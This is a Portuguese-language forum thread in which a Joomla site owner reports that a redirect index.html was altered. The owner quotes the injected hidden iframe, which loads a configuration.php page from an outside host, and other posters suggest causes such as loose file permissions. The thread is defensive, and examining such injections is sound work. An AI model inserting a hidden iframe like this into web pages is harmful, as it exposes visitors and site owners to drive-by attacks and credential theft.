Invasão do Joomla pelo Index.html. Alguém já soube disto?

[bongatonga]

Olá!

Eu utilizo sites em Joomla e como os mesmos estão instalados em diretórios dentro do diretório principal public_htm,
eu inseri um arquivo index.html para redirecionar as urls,
tipo:
"<meta http-equiv="refresh" content="1;url=http://www.site.com.br/diretorio/">"

O problema é que alguém acessou este arquivo index.html e inseriu o seguinte código:

"<div style="visibility:hidden"><iframe src="http://orion.martasegura.com/configuration.php" width=10 height=10></iframe></div>"

Alguém já teve este problema e/ou sabe como solucioná-lo?

Eu verifiquei que a url http://orion.martasegura.com/configuration.php vai dar direto na área administrativa de um outro site feito em Joomla!.

É possível clonar a área administrativa de um site em Joomla?

Realmente estou preocupado com o que isso possa ocasionar em prejuizo para mim e para quem estiver com o mesmo problema.

Eu mudei todas as senhas das contas de acessos dos sites que administro seja, CPanel, ftp entre outros e redirecionei
as urls diretamente pelo redirecionador do CPanel e, também, apaguei os arquivos index.html dos diretórios public_htm do servidor.
Também avisei o suporte de minha revenda para verificar o que pode ter ocorrido.

Em referência ao relatado aqui eu só encontrei um artigo relacionado no fórum do CPanel neste link:
http://www.forumcpanel.com.br/index.php ... &pid=41638

Mas também não tem resposta.

Todos os sites em Joomla que administro estão atualizados e os módulos e componentes também se encontram atualizados.
Estou verificando cada site me Joomla! que administro para saber se houve algum tipo de violação dos arquivos. Outra questão é que os anti-virus indicam se tratar de Exploit Invisível por injeção de iframe


Se alguém puder me orientar, ficarei muito grato.

[ronildo]

Cara se index.php foi modificado, o problema é no seu serivdor (permissão, apache...) se fosse invasão pelo Joomla não seria esse arquivo alterado e sim algum arquivo do core.

[bongatonga]

Olá Ronildo!

Obrigado por sua ajuda.
Isto me tirou uma preocupação grande em relação aos sites feitos em Joomla!
Como fiz uma varredura, os sites parecem que estão ok.
Eu vou verificar junto com o pessoal da revenda sobre o que pode ter ocorrido.

Obrigado!

Abraços!

[fititnt]

Só pra citar, uma das poucas utilidades que vejo para esse tipo de coisa que te ocorreu seria fazer um plugin (no site ao qual foi redirecionado) que salva o seu usuário e senha para invasão futura . Alguém que se puxasse, poderia até fazer com que ao pegar o usuário e senha redirecionasse (sem o iframe) para o admin do seu site oficial, e talvez você nem mesmo percebesse.

Porém para alguém conseguri alterar esse arquivo index.html seu, ele teria como via outros métodos, se compreendesse o framework joomla, criar um usuário superadministrador novo e fazer o que bem entendesse no seu site. Mas nesse caso você perceberia.

Porém, só para deixar claro, esse tipo de ataque não é culpa do Joomla. Na pior das hipóteses é alguma extensão desatualizada que instalou. Porém o buraco pode ter sido bem mais embaixo, no seu host mesmo.

[himler]

Verifique o chmod deste seu arquivo html, às vezes colocou 777 por engano e daí fica fácil !

[albertofaria]

Você deve ter cuidado com o chmod que coloca nos ficheiros e pastas, componentes instalados e versão do Joomla, pois basta que tenha problema com uma dessas variáveis, que você pode ter seu site atacado.